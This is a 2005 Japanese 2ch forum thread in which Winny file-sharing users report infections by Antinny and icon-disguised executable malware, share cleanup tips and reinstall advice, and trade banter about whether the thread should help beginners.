ついでに言えばエクスプローラも下線付きのシングルクリック設定にしとけば
ぬるぽ.avi .exe
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
という表示になるから拡張子偽装も一目で解るし絶対踏むこともない。
テンプレには
>・うっかり操作防止のため、エクスプローラの操作はダブルクリック。
などと書いてあるがむしろ逆効果だろ。
571:[名無し]さん(bin+cue).rar
05/02/16 13:32:01 Sv98ZUp50
ありえねぇ。
つーかフォルダアイコンくらいデフォルトから必ず変更しとけって話。
ついでに言えばエクスプローラも下線付きのシングルクリック設定にしとけば
ぬるぽ.avi .exe
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
という表示になるから拡張子偽装も一目で解るし絶対踏むこともない。
テンプレには
>・うっかり操作防止のため、エクスプローラの操作はダブルクリック。
などと書いてあるがむしろ逆効果だろ。
572:[名無し]さん(bin+cue).rar
05/02/16 13:33:41 oDxgolZA0
だからフォルダ表示を変更しておけって。
うちは2000だから、もともと無問題だが。
573:[名無し]さん(bin+cue).rar
05/02/16 13:31:54 Sv98ZUp50
ありえねぇ。
つーかフォルダアイコンくらいデフォルトから必ず変更しとけって話。
ついでに言えばエクスプローラも下線付きのシングルクリック設定にしとけば
ぬるぽ.avi .exe
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
という表示になるから拡張子偽装も一目で解るし絶対踏むこともない。
テンプレには
>・うっかり操作防止のため、エクスプローラの操作はダブルクリック。
などと書いてあるがむしろ逆効果だろ。
574:[名無し]さん(bin+cue).rar
05/02/16 13:41:10 dgi/UPzf0
すっかり498の日記帳になったな
575:[名無し]さん(bin+cue).rar
05/02/16 13:42:42 dgi/UPzf0
ここは498の日記帳になったようだな
576:555
05/02/16 13:44:50 A4Is3sXe0
498タン見てる?
いろいろやってみたけど、タスクのスケジュールでスケジュールから起動するとアプリも起動できるみたい。
で、窓の社とか立ち上げたけど自動起動に変なものはなかったからレジストリかと。
でも他にどんな害があるのかは知らぬ。
577:555
05/02/16 13:45:24 A4Is3sXe0
498タン見てる?
いろいろやってみたけど、タスクのスケジュールでスケジュールから起動するとアプリも起動できるみたい。
で、窓の社とか立ち上げたけど自動起動に変なものはなかったからレジストリかと。
でも他にどんな害があるのかは知らぬ。
578:[名無し]さん(bin+cue).rar
05/02/16 13:46:57 A4Is3sXe0
498タン見てる?
いろいろやってみたけど、タスクのスケジュールでスケジュールから起動するとアプリも起動できるみたい。
で、窓の社とか立ち上げたけど自動起動に変なものはなかったからレジストリかと。
でも他にどんな害があるのかは知らぬ。
579:555
05/02/16 13:48:06 A4Is3sXe0
多重カキコスマン
580:[名無し]さん(bin+cue).rar
05/02/16 13:54:48 d4WhvpXs0
一時ダウソ板がおかしかったからな
581:[名無し]さん(bin+cue).rar
05/02/16 13:57:15 cwJo8nW70
赤いめがねのCGのウイルスかかったのですが
どうしたらいいですか?やっぱりOSインスコですか?
他に何かあるの?
582:[名無し]さん(bin+cue).rar
05/02/16 14:01:02 /SfQnaHt0
解決するまで498にのんびりできる日々はこない
583:498
05/02/16 14:01:20 T5lKoGkm0
>>576
みてるみてる
アプリが使えるようなら、DVD-Rに退避して再インストールの方向で検討します
ワームみたいにほかのファイルに転移するのか不明なのでそれを確認してからかな?
何となくほかのファイルは無事な気がするけど
584:555
05/02/16 14:12:43 A4Is3sXe0
今見たらexeに関するレジストリは無事だったんだよね。
HKEY_CLASSES_ROOT -> .exe
の部分だけど。
最インスコした方が早いかなぁ?
585:[名無し]さん(bin+cue).rar
05/02/16 14:14:31 A8cLyt/t0
平穏だったのに
ウイルス踏んだ厨が居座って盛り上がってますねw
解析する力も気もないなら
ケーブル切って素直に再インストールしとけ。
586:[名無し]さん(bin+cue).rar
05/02/16 14:23:15 11Ht2S4t0
エラソ・・・
587:[名無し]さん(bin+cue).rar
05/02/16 14:29:40 8u5kWtwR0
普通の反応と思うけど
588:[名無し]さん(bin+cue).rar
05/02/16 14:31:25 oDxgolZA0
>>1の1行目も読まずに厚顔無恥な質問してくるほうが、えらそうと
いうか傍若無人というか。
589:[名無し]さん(bin+cue).rar
05/02/16 14:33:05 cNq7VYDw0
エラソもなにもココはそーいったスレじゃね?
>>1の1行目すら読まないヴォケはニュイルス踏んで滅んでしまへ
590:[名無し]さん(bin+cue).rar
05/02/16 14:45:13 T5lKoGkm0
>>588>>589
あ~ごめん
ぜんぜん読んでませんでした
もう出てきませんので許してください
591:[名無し]さん(bin+cue).rar
05/02/16 14:52:52 EacPUhRQ0
雑誌の立ち読みしただけなので記憶があやふやだけど
拡張子ごとに色を変える方法があったような…
exeやcomが赤く表示できれば引っかからないんだが
592:[名無し]さん(bin+cue).rar
05/02/16 15:09:06 jcwssrC/0
>591
詳細表示で「ファイルの種類」も表示させればいいじゃん。
593:[名無し]さん(bin+cue).rar
05/02/16 15:14:30 A8cLyt/t0
>>591
>>5
>・アイコン偽装したexeを見分けるため、
> フォルダ・txt・aviなど偽装されやすい拡張子は標準アイコンから変更しておく。
なヨカーン。
違うとしても少なくともこの方法でアイコンを標準と明らかに違うのを使えば誤って踏むことはない。
594:[名無し]さん(bin+cue).rar
05/02/16 15:25:50 ZboJx+CZ0
Winnyウイルスをなぜ踏むのかランキング
1、抜ける画像、エロゲーの前に興奮してついつい即解凍、即クリック
2、ほしかった画像、ゲーム、データの前に興奮してついつい即解凍、即クリック
3、チェックしてもひっかからなかった。
最近はウイルスチェックをいちいちめんどくさがる人もいます、でもよく考え
てください。チェックにかける時間と、かかったあとに駆除処理をする時間を・・
比べてください。
あと落としたデータの属性と中身を考えましょう。
コミック、同人誌、などの書物のデータなら
解凍したあと、フォルダの中身にJPEG イメージなどがあるはずです、
それもページ数相応に、あきらかにフォルダの中に、よくわからんフォルダ
があったり、bmpファイルがあったり(漫画類でbmpはほとんどありえない)、
JPEGが数個しかなかったり、あきらかに怪しいので、注意しましょう。
解凍ソフトは中身がみれるRARなどがお勧めです、ただ解凍前にチェック
するのも忘れずに。
595:[名無し]さん(bin+cue).rar
05/02/16 16:01:05 om6x2Fgw0
たしか>>507みたいな奴で中のフォルダをダブルクリックしたけど
何も起こらなかった その後スキャンしても関係ないトロヤンがあっただけ
596:[名無し]さん(bin+cue).rar
05/02/16 17:07:24 1RSiFY+c0
面白いウィルスがあると聞いて飛んできました
初心者の頃このスレにお世話になったなぁ
今となってはおそらく当分お世話になることはないだろうけど
597:[名無し]さん(bin+cue).rar
05/02/16 18:02:46 U+44562u0
ファイラー使ってないやつ、多いんだな・・・。
598:[名無し]さん(bin+cue).rar
05/02/16 18:19:45 gB55GAf20
>>590
もうみてないかもしらんが
www.symantec.com/region/jp/sarcj/data/t/tool.to.reset.shellopencommand.registry.keys.html
を入れたらなおったっぽい
たぶん
599:555
05/02/16 18:44:33 A4Is3sXe0
>>598
神! 神! 神!
つまりこのウイルスの駆除方法は
セーフモードで C\windows/system32 の中の taskmen.exe を削除後に>>598 をインスコでとりあえず通常の状態には戻るのかな?
他にどんな効果があるのかわからないのが怖いが。
600:[名無し]さん(bin+cue).rar
05/02/16 18:46:02 A4Is3sXe0
あ、でもまだスタートからシャットダウンがないのとCtrl + ALT + Del からシャットダウンが選択できないなぁ。
601:[名無し]さん(bin+cue).rar
05/02/16 18:46:11 1RSiFY+c0
待っていればそのうちノートン先生がちゃんとしたパッチ出してくれると思うけどね
602:[名無し]さん(bin+cue).rar
05/02/16 18:50:45 nFrqc8/G0
【使用OS】ME
【WindowsUpdateしてるか】している
【使用AntiVirusソフト】ウイルスバスター2004
【AntiVirusをUpdateしてるか】している
【ウイルススキャンの結果】
17件ヒット
種類 ウイルス名 感染元 ウイルス検出時の処理 ウイルス駆除
ファイル WORM_ANTINNY.A A0900358.CPY (C:\_RESTORE\ARCHIVE\FS179.CAB) 隔離できません
ファイル --- C:\_RESTORE\ARCHIVE\FS20.CAB ウイルス駆除できませN 隔離できません
ファイル PE_Parite.A A0884060.CPY (C\_RESTORE\ARCHIVE\FS20.CAB ウイルス駆除できませN 隔離できません
【オンラインスキャンしたなら結果】
【Winnyのバージョン】1.14
【Winny歴、総DL量】半年。5GBぐらい。
【テンプレを読んだか】呼んでない。
【テンプレにある対策を実行したか】してない。
【症状、具体的に分かる限りすべて書く】ウイルス検索にひっかかる。なんか怖い。
【何をしたらそんなことになったのか】600KBぐらいのEXEファイルを落としていた。9KBぐらいのメガねのおっさんの画像を落としていた。
【これまでにとった措置】ウイルスバスターのサイトに逝って、ANTINNY駆除対策の実行を試みた。
レジストリエディタでRUNの値を見たが怪しいのが無かった。わかんなくなった。助言をしてください。
603:[名無し]さん(bin+cue).rar
05/02/16 18:51:58 1RSiFY+c0
>>602
隔離したなら問題ない
604:[名無し]さん(bin+cue).rar
05/02/16 18:53:03 1RSiFY+c0
あー隔離できなかったのね
じゃあ自分で隔離したら?
605:[名無し]さん(bin+cue).rar
05/02/16 18:54:33 bQHwbkjv0
\_RESTORE\ARCHIVE
でググれ、これテンプレ入れた方が良いんじゃないか?
606:[名無し]さん(bin+cue).rar
05/02/16 18:54:47 YB+Js9Hb0
またC:\_RESTOREかよ。
ぐぐったら対策が山ほどでてくるから、それ読んでこい。
つか中途半端にテンプレ埋める前に、>>1の1行目も熟読しろ。
607:602
05/02/16 18:57:36 nFrqc8/G0
>>603-606
すんまそん。ググッテ調べてみます。
608:[名無し]さん(bin+cue).rar
05/02/16 21:13:38 ZboJx+CZ0
/|:: ┌───┐ ::|
/. |:: | | ::|
|.... |:: | Antinny.j .| ::|
|.... |:: | | ::|
| |:: | | :: |
|.... |:: └───┘ ::|
\_| ┌──┐ .| ∧∧
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ( _)
/ ̄ ̄ ̄ ̄ ̄旦 ̄(_, )
/ \ `
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|、_)
 ̄| ̄| ̄ ̄ ̄ ̄ ̄ ̄| ̄| ̄
| .( ( | |\
| ) ) ) | | .|
|________(__| .\|
/― ∧ ∧ ―-\≒
/ ( ) \
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ |
|______________|
∧∧
( ・ω・)
_| ⊃/(___
/ └-(____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄
<⌒/ヽ-、___ <シクシク
/<_/____/
609:[名無し]さん(bin+cue).rar
05/02/16 21:25:50 T5lKoGkm0
>>3
『まず、ここは初心者の質問・救済スレではありません。』なので、
次回から「質問テンプレ」ではなく「報告テンプレ」にしてはいかがでしょうか?
610:[名無し]さん(bin+cue).rar
05/02/16 21:29:45 AEH+3d3T0
つーかさ、なんでこのスレの人はこんな不親切なわけ?
リア厨と謗られようと構わない。もっと親切に教えろ!と俺は言いたい。
しっかり対策されたパソコン使ってるような人はこれでも良いんだろうけど。
てかさ、あんたらだって昔は俺みたいにわかんない事だらけだったんだろ?
みんな最初は初心者なんだからさ、親切に教えるべきだと思うよ。
ルータのポート設定も。動画の再生方法も。ウイルスだってそうだ。
テンプレももっとわかりやすくしてくれよ。正直なに書いてあるのかさっぱりだし。
すぐにとは言わないけど、次スレまでには何とかして欲しい。
とりあえず俺が言いたいのはそれだけだ。
611:[名無し]さん(bin+cue).rar
05/02/16 21:32:18 SvoWFs6H0
リア厨乙
612:[名無し]さん(bin+cue).rar
05/02/16 21:33:58 BtJWjdz80
>ルータのポート設定も。動画の再生方法も。ウイルスだってそうだ。
全部ググって勉強した
613:[名無し]さん(bin+cue).rar
05/02/16 21:35:00 YB+Js9Hb0
もっと学んで答えられるようになってから、またおいで。
614:[名無し]さん(bin+cue).rar
05/02/16 21:41:39 /i6kkWze0
俺は教えられたら教えるけど、馬鹿だぞ?
615:[名無し]さん(bin+cue).rar
05/02/16 21:48:37 bQHwbkjv0
つーか縦読みしろっていうのは無粋かな
616:[名無し]さん(bin+cue).rar
05/02/16 21:49:51 bQHwbkjv0
書き忘れた、良くできてる
617:[名無し]さん(bin+cue).rar
05/02/16 22:15:04 5vqDJeRq0
>>611-614はうっかりexe踏むタイプだな
間違いない
618:[名無し]さん(bin+cue).rar
05/02/16 22:22:32 /i6kkWze0
>>617
そんな事はない。
うっかり踏んでしまうなんて…そんな馬鹿じゃないよ。
だが、一瞬の判断の間違いってもんがあるだろ
なんでも確認してやれないだろ。
619:[名無し]さん(bin+cue).rar
05/02/16 22:50:23 K4758CMS0
44 名前: [名無し]さん(bin+cue).rar [sage] 投稿日: 05/02/16 21:40:18 ID:BWrclx0W0
Winny悪性の新ウィルス出現
~確認と削除方法~
①スタートメニューからコントロールパネルを選択
②フォントフォルダを開く
③赤い地でAと書いたファイルが有ればウィルスです。
④全て削除して下さい。(数回警告が出ますが、OKを選択)
⑤再起動
これ本当?
620:[名無し]さん(bin+cue).rar
05/02/16 23:03:16 ogrC3kED0
>>619
お前はnyやる前にWindowsを勉強しろ
621:ぬるぽ詰め合わせ.zip.exe
05/02/16 23:10:38 5vqDJeRq0
>>618
一瞬の判断ミスとか、油断とかはうっかりに含まれね?
俺的には、普段注意してる奴がexe踏んだらすべてうっかりだ
そしてそれは俺のことだ
>>619
うわぁ、何かこわいですね!(^_^;)
・・・で、それはどんなウィルスなんだ?
622:[名無し]さん(bin+cue).rar
05/02/16 23:38:16 x8e+VWk+0
>>610
不親切というか、ここ質問スレじゃないし。
623:[名無し]さん(bin+cue).rar
05/02/16 23:40:02 BWc9/FXx0
409と同じウイルスにかかった人、Documents and Setting のフォルダ(もしくはその中のフォルダ)を開くと、
「Microsoft .NET Passportにサインイン」というウインドウが出ませんか?これはウイルスのせいでしょうか?
それともこれはウイルスにかかっていなくても出るものなのでしょうか?
同じ症状の人いませんか?
624:[名無し]さん(bin+cue).rar
05/02/17 00:18:28 BFPKKsqg0
>>622
つくづくここの人は親切じゃないね。
理解ってものを少しは示してくれてもいいんじゃないの?
できるんなら俺だって自分で何とかしたいよ。できないから頼ってるんだよ。
スレが違うとかじゃなくてさ
ネットに繋いでる者同士仲良くするべきなんじゃないの?
あんたも人間ならさ、困ってる人見つけたら
なんとかしてあげようって気にはならないの?
たすけてくれよ!まじで!
625:[名無し]さん(bin+cue).rar
05/02/17 00:28:04 bIMJr/3FO
困ってる人みるとニヤニヤしたくなるよ
みんなもそうだろ?
626:[名無し]さん(bin+cue).rar
05/02/17 00:28:35 NSXQXuIW0
マジレスすると、まず、ググった?
面倒な人は再インスコ。
627:[名無し]さん(bin+cue).rar
05/02/17 00:32:49 cp/5t5XF0
おいおい
直前のレスぐらい読めって
628:[名無し]さん(bin+cue).rar
05/02/17 00:38:26 /KObySx90
>>624
俺も猫大好き
629:[名無し]さん(bin+cue).rar
05/02/17 00:39:12 GSORNqpl0
>>624
助けてくれよと言う人間にホイホイ手を差し伸べていっても
その人のためにならない。人を頼ることが癖になる。
調べれば出てくるのに調べないそいつが悪い。
自己責任でするべき事に他人を関わらせるって事がどうかしてる。
>>610では
みんな最初は初心者だったのだから教えてやれ
とほざいているが
自分は今の知識を全て自分で調べた。
理解できないことは
根気強くネット上に這いつくばって調べたり本買って読むなどすれば
その内理解できる
つーことで
自分で調べれば解決できる
解決できないからって直ぐに人を頼らない
これ鉄則
出来ないならny辞めろ
630:[名無し]さん(bin+cue).rar
05/02/17 00:40:45 GSORNqpl0
あぁ縦読みにマジレスしてる自分が恥ずかしい(´Д`*)
631:[名無し]さん(bin+cue).rar
05/02/17 00:41:49 BFPKKsqg0
もっと親切にしてくれっていってんだろ?
うだうだ言ってないでさ
むずかしいことはできないかから
りかいできる言葉でしゃべってくれる?
ぽは無理だろ。思いつかないよ。
632:[名無し]さん(bin+cue).rar
05/02/17 00:44:30 GSORNqpl0
>ぽは無理だろ。思いつかないよ
ワロタ
633:[名無し]さん(bin+cue).rar
05/02/17 00:44:46 bIMJr/3FO
携帯からだと盾詠みになってないよぅ
634:[名無し]さん(bin+cue).rar
05/02/17 00:46:34 hqWZ+K8t0
>>630
つまづいたって いいじゃないか 人間だもの みつを
635:[名無し]さん(bin+cue).rar
05/02/17 01:23:41 iLRdDFTZ0
>>498
俺も同じの踏んだ
exeは起動できるようになったけど、シャットダウンできないから
今月始めにとったバックアップで復旧してみます
636:[名無し]さん(bin+cue).rar
05/02/17 01:24:47 RjsamEOa0
>>631
Antinny救済質問スレでも立てたらどうよ。
きっと親切な人がよってたかって答えてくれるよ。
637:[名無し]さん(bin+cue).rar
05/02/17 01:32:43 fxPZuFa00
>>636
空気嫁
でも、もう質問とゆーか、感染者同士の報告・対処情報交換スレと
解析調査・技術検討スレは別に立てないとあかんと思うよ
もうこのスレだめぽ
638:[名無し]さん(bin+cue).rar
05/02/17 01:36:25 Au/VT9Ej0
久しぶりに来たが
ギシギシアンアンでexe関連付けというのはかなり前に流行って収束してたような?
誰かがちょっと変更してしこんだのか?
でも対処は以前と全く同じにみえる
639:[名無し]さん(bin+cue).rar
05/02/17 01:45:24 iLRdDFTZ0
>>638
詳しく
640:[名無し]さん(bin+cue).rar
05/02/17 01:52:11 6M728Uwg0
ブーブ-教えろって言ってるやつ。
理解できるまで俺が最後まで付き合ってやるから、
俺に頭下げてみろ。
641:[名無し]さん(bin+cue).rar
05/02/17 02:22:41 2wOW0GuP0
おまいら
ここは質問スレでも釣り堀でもねーぞ
敢えて呼ぶなら水族館だw
642:[名無し]さん(bin+cue).rar
05/02/17 03:15:41 CzcyHTEY0
>498
これで。
URLリンク(www.symantec.com)
643:[名無し]さん(bin+cue).rar
05/02/17 03:18:01 fxPZuFa00
既出なのでageてもウザいだけ
644:[名無し]さん(bin+cue).rar
05/02/17 03:58:09 69263+OL0
Antinny.Gってどう?
結構、芸術的な気がしない?
645:[名無し]さん(bin+cue).rar
05/02/17 04:31:35 5jYumHa00
質問だめなら質問を荒らしとみなして無視して雑談すればいいじゃん^^
禁止しても代わりのスレがないなら結局ここに来る^^
代わりになるスレでも立てよう^^
文句言ってないで少しは自分で何とかしたら^^?
646:[名無し]さん(bin+cue).rar
05/02/17 04:34:31 6M6utTBz0
質
禁
代
文
647:[名無し]さん(bin+cue).rar
05/02/17 04:59:34 9a3GHuBe0
£←キモイ
648:[名無し]さん(bin+cue).rar
05/02/17 07:16:18 fvMPnGqW0
>>624
PC関係の板じゃ、親切な方がよっぽど珍しい。 ^^;
なぜなら、質問してくる人に長文でマジレスつけても、
「サンクス」の一言も書かない輩に当たったことがあるから。
649:[名無し]さん(bin+cue).rar
05/02/17 07:37:18 V+YsJQLu0
>>648
断て読みレスに回答してたから、返事こなかったんじゃね~の?
650:[名無し]さん(bin+cue).rar
05/02/17 07:41:24 fxPZuFa00
情報スレとか関係なく教えろだの釣りだの雑談だので
埋まってしまうあたりがダウソ板らしいところだ
651:[名無し]さん(bin+cue).rar
05/02/17 07:43:45 fvMPnGqW0
>>644
SSを晒す金玉は本当に芸術的な作品でしたな。
あの祭りは楽しかった
652:[名無し]さん(bin+cue).rar
05/02/17 08:01:14 vpFLciKv0
xpの起動回数が18回前後で、デスクトップやシステム設定が初期化されるんだけど、これって、ウィルスのせい?
653:[名無し]さん(bin+cue).rar
05/02/17 08:20:16 6M6utTBz0
>>652
>>1
『まず、ここは初心者の質問・救済スレではありません。』
654:[名無し]さん(bin+cue).rar
05/02/17 08:31:25 iheRM8cE0
新種のキンタマウィルスまだー
655:[名無し]さん(bin+cue).rar
05/02/17 08:34:22 QGozIDvB0
xpの起動回数が18回前後で普通にダウン板に書き込みですか。
なかなかやるなあ。
スレ読んでて思ったが、ny使用中にブラウザが重くなるんで
なかなか読み込みされなくて待ちきれず、
思わず多重カキコしちまった時期があったよ。ぬるぽ
656:[名無し]さん(bin+cue).rar
05/02/17 09:11:49 PxvVObJn0
mpgファイルをダブルクリックしたら動画が再生されずHDDにアクセスしっぱなしになりました
これってウィルスでしょうか?
657:もうお腹いっぱいだよ
05/02/17 09:18:38 sJZetti/0
>>656
正解、ウィルスだ
さっさとOS再インスコしろよ。それ以外に方法無いから。
658:[名無し]さん(bin+cue).rar
05/02/17 09:22:59 PxvVObJn0
あうち(;´д⊂ヽ
659:[名無し]さん(bin+cue).rar
05/02/17 09:27:15 fvMPnGqW0
おいおい。いきなり再インスコかよw
660:[名無し]さん(bin+cue).rar
05/02/17 10:08:03 KsoiLSz40
>>498
を踏んだんだけどシステムの復元したら
タスクマネージャも普通に動くけど
これじゃ駄目なのかな?
661:[名無し]さん(bin+cue).rar
05/02/17 10:12:48 eJgHVsns0
>>660
お前がそれで良ければ問題ない
662:[名無し]さん(bin+cue).rar
05/02/17 11:44:43 +35bQR1u0
>>660
この板の住人はシステムの復元はみんなOFFにしてるんだよ。
663:[名無し]さん(bin+cue).rar
05/02/17 12:06:29 DVNyv/gu0
俺のデスクトップ、今月号が結構見つかるんですけど、
なんかまた亜種でも流行ってるんですか?
664:[名無し]さん(bin+cue).rar
05/02/17 13:25:11 gpvqTcyJ0
可能性がないとは胃炎
665:[名無し]さん(bin+cue).rar
05/02/17 14:34:32 v3FUi1sD0
>>409
昨日やられたorz
666:[名無し]さん(bin+cue).rar
05/02/17 14:42:13 yYKnnmV10
やられた。
アイコン偽装されてた。
クリックしたら「晒されたっていいじゃないか泥棒だもの ぬるぽ」
だと。
これってOS初期化するしか無い?
667:[名無し]さん(bin+cue).rar
05/02/17 14:43:58 gy9vfL2w0
【使用OS】 WinXP Home sp2
【WindowsUpdateしてるか】 している
【使用AntiVirusソフト】 ウィルスバスター2005
【AntiVirusをUpdateしてるか】 している
【ウイルススキャンの結果】 脅威なし
【オンラインスキャンしたなら結果】 脅威なし
【Winnyのバージョン】 b7.1
【Winny歴、総DL量】 200Gぐらい
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】しました
【症状、具体的に分かる限りすべて書く】
今まで一度も接続したことのないはずのBBSが勝手に作動
BbsNoderefを見てみるとなぜかノードがあり削除してももう一度起動させるとまた、ノード
が追加されています
【何をしたらそんなことになったのか】ウィルスチェックしてzipを開くとどう考えても怪しい
txtファイルがありとりあえずウィルスチェックするも反応なし・・・そのまま削除すればいいのだが
なぜかクリック→Antinny.Gに感染→orz
【これまでにとった措置】
→とりあえず削除、レジストリも多分問題なしAntinny.Gは解決
がBBSの症状はそのままこれってなんでしょうか?
668:[名無し]さん(bin+cue).rar
05/02/17 14:48:41 UDXE5NVR0
『まず、ここは初心者の質問・救済スレではありません。』
669:[名無し]さん(bin+cue).rar
05/02/17 14:53:33 rb1KH8Yz0
>>667
バスターが反応しないのに何故Antinny.Gって分かったの?
亜種じゃねーのか?
って言うか、何を踏んだのか、ファイル名・ハッシュ書けよ
そんなんじゃ答えようがない
>>666
お前は放置
670:[名無し]さん(bin+cue).rar
05/02/17 15:14:32 gy9vfL2w0
>>669
バスターはAntinny.Gには反応したんですが他にもなんか入ってたんじゃないかと
(Cレヴォ36) (同人誌) [D・N・A.Lab.] からだであそぼ (縦1500_14枚) (DEATH NOTE).zip
d3d9f3a1a9869f6dcaf93f197cf7654c
671:666
05/02/17 15:18:52 yYKnnmV10
いや、みんなが言うようにデスクトップ変更だけじゃなくて
例えば壁紙戻そうとしたら
C:\WINDOWS\system32\rundll32.exe
アプリケーションが見つかりません
って出てくるんだけど。
672:[名無し]さん(bin+cue).rar
05/02/17 15:30:30 4rsPj/GR0
このスレ推奨ニュイルス対応策
・クリーンインスコ
・PCを窓から投げ捨てる
・いっそペットとして飼ってみる
673:666
05/02/17 15:38:56 yYKnnmV10
いろいろ調べてみてるんだけどどうにも似たようなケースが無いみたい。
NYも起動できない。プログラムが開けない。
プログラムの追加と削除も開けないし。
ノートンがなにか削除したんだけどこうなっちゃった。
674:[名無し]さん(bin+cue).rar
05/02/17 15:51:13 seh6uXA60
皆に万能の解決策を教えてやる
ク リ ー ン イ ン ス ト 汁
675:666
05/02/17 16:25:34 yYKnnmV10
レジストリからなんか消せば直るのかな。
676:[名無し]さん(bin+cue).rar
05/02/17 16:28:55 GSORNqpl0
>>675
一つ上のレス
677:666
05/02/17 16:38:07 yYKnnmV10
訂正。アプリケーションを開こうとしたら
「ファイルを開くプログラムの選択」
ってゆうのが出てきて、
そこからそのアプリケーションと同じものを選ぶと開けた。
どうにかしたら直りそう。もう少し頑張ってみる。
678:[名無し]さん(bin+cue).rar
05/02/17 16:39:36 UDXE5NVR0
こんどは666の日記になるのかよorz
679:[名無し]さん(bin+cue).rar
05/02/17 16:48:08 rb1KH8Yz0
>>670
えーと、落として確認してみた。
BBSは俺も使ってなかったんだけど、BBS画面やBBSノードタブを開くと勝手に接続するね
BBSノードを削除してキャッシュクリアしてBBS切断してしばらくして接続解除されたけど多分大丈夫じゃないの?
詳しい人フォローよろしく
で、問題のファイル。俺の環境(XP_Pro)だと思いっきりexeに見えるんだけど
URLリンク(2ch-library.com) どうしてこれがテキストに見えたのかが疑問
左上の.folderファイルはよく分からん。AVGでウイルス反応無し。
203バイトなのでウイルスで無いだろうけど、もちろんダブルクリックする勇気は無しw
とりあえずantinnyGの対処だけで無問題だと思うけど心配ならクリーンインスコして頂戴
680:[名無し]さん(bin+cue).rar
05/02/17 16:50:02 NkY+ulh10
もっと親切にしてくれっていってんだろ?
うだうだ言ってないでさ
むずかしいことはできないかから
りかいできる言葉でしゃべってくれる?
ポワトリン好きだろう?お前ら?
681:[名無し]さん(bin+cue).rar
05/02/17 16:50:08 u/d5bGAc0
少し優しくなったね。ウイルス制作者さん
あんまりいじめないであげてね。
682:[名無し]さん(bin+cue).rar
05/02/17 16:52:11 FjJMWqwF0
>>669が偉そうだったからつい解析する気概のある人が来たかと思ったら、
ただのヘタレじゃんかよw
683:[名無し]さん(bin+cue).rar
05/02/17 16:53:59 wILsdj4o0
感染すると人のぬくもりが恋しくなる
684:[名無し]さん(bin+cue).rar
05/02/17 16:56:30 rb1KH8Yz0
>>682
今から上級者のID:FjJMWqwF0が解析してくれるそうです
皆さん生暖かく見守ってあげましょうw
685:[名無し]さん(bin+cue).rar
05/02/17 17:34:53 gy9vfL2w0
>>679
わざわざありがとうございます
パソコン買い換えてすぐなんで拡張子表示忘れてたんですが
↓拡張子表示してもこんな感じでtxtファイルにみえます
URLリンク(2ch-library.com)
とりあえずこののま監視してなんかやばそうだったらクリーンインスコしてみます
686:[名無し]さん(bin+cue).rar
05/02/17 17:42:21 JHbA3jZA0
>>685
どう見てもアイコン偽装のexeなわけだが
687:[名無し]さん(bin+cue).rar
05/02/17 17:47:57 GVmTBFyy0
↓次の方どうぞ
688:[名無し]さん(bin+cue).rar
05/02/17 17:57:42 rb1KH8Yz0
>>686
表示いろいろ変えてみたんだが、俺のXP_Pro SP2だと偽装表示されないんだよね
どうしてだ?
URLリンク(2ch-library.com)
689:[名無し]さん(bin+cue).rar
05/02/17 18:17:32 nN/IV6U/0
【使用OS】xp home sp2
【WindowsUpdateしてるか】してる
【使用AntiVirusソフト】ノートン2005
【AntiVirusをUpdateしてるか】してる
【ウイルススキャンの結果】脅威なし
【オンラインスキャンしたなら結果】していない
【Winnyのバージョン】7.1
【Winny歴、総DL量】80G程度
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】一通り確認した
【症状、具体的に分かる限りすべて書く】
基本的には666と同じ
exeが.folderに偽装されている。
踏むと壁紙が「晒されたっていいじゃないか泥棒だもの ぬるぽ」 と書かれたbmpに
変更される。
どうやら、windowsフォルダにある模様。
【何をしたらそんなことになったのか】
(一般コミック・雑誌) [ジャンプ] [2005-12] DEATH NOTE page.58 「胸中」.zip,sIdxNm06Hv,0,0,1cafd7101e4dee38d4a613c95c78c887,1
を解凍、中にある偽装されたexeを踏んだ
【これまでにとった措置】
とりあえず、windowsフォルダに出来たbmpファイルを消した
690:[名無し]さん(bin+cue).rar
05/02/17 18:28:24 RjsamEOa0
>>685
めちゃワロタ
691:[名無し]さん(bin+cue).rar
05/02/17 18:30:21 NFXyShHz0
>>685
なんだ、フィッシングか・・・
>>680
面白い
692:666
05/02/17 18:36:26 yYKnnmV10
なんかもうしんどくなったんで再インストールした。
こうゆうの対処できる人間はいいねぇ。
693:[名無し]さん(bin+cue).rar
05/02/17 18:45:52 yOWVIG390
【使用OS】 winxp sp1
【WindowsUpdateしてるか】 してる
【使用AntiVirusソフト】 ノートン2004
【AntiVirusをUpdateしてるか】 してる
【ウイルススキャンの結果】 できない
【オンラインスキャンしたなら結果】
【Winnyのバージョン】 7.1
【Winny歴、総DL量】
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 してるところ
【症状、具体的に分かる限りすべて書く】 「晒されたっていいじゃないか泥棒だもの ぬるぽ」
の壁紙になるのは同じだけど、その後全ての.exeファイル(ブラウザソフト、ノートン等)が起動できなくなった。
マイコンピューターのプロパティなんかもファイルが見つかりませんと言われる。
現在家にあるもう一台のPCで接続中なので、これに感染したら初期化する以外ネットに繋げないかも。
【何をしたらそんなことになったのか】 ウィニー起動してノードが繋がったらクリックしてないのに
勝手にハンターハンター12というファイルが落とされてきた。
削除と間違えて開くをクリックorz
【これまでにとった措置】 初期化中